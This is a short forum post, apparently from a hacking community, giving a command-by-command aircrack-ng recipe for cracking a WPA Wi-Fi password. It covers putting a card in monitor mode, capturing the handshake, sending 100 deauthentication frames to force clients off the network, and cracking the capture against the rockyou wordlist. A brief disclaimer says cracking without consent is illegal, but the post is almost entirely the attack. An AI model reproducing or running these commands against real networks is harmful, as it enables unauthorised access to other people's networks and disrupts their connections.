Notifications
Clear all
Command Line
1
Posts
1
Users
0
Reactions
119
Views
Topic starter
Disclaimer
Hacking peoples wifi without their consent is illegal.
Always be ethical when hacking.
Go Team Orange!
Hacking peoples wifi without their consent is illegal.
Installation
this comes preinstalled in Kali but can be downloaded through Package Manager
sudo apt install aircrack-ng
Cracking
Get Wireless Cards
iwconfig
Put wireless card in monitor mode
airmon-ng start wlan0
Beacon Scan
airodump-ng wlan0mon
Store Packets
sudo airodump-ng --bssid A1:B2:C3:D4:E6:F7 -c 11 wlan0mon --write handshake.cap
De-Auth
sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon
Crack
sudo aircrack-ng handshake.cap-01.cap -w /usr/share/wordlists/rockyou.txt
Posted : 23/07/2024 10:04 pm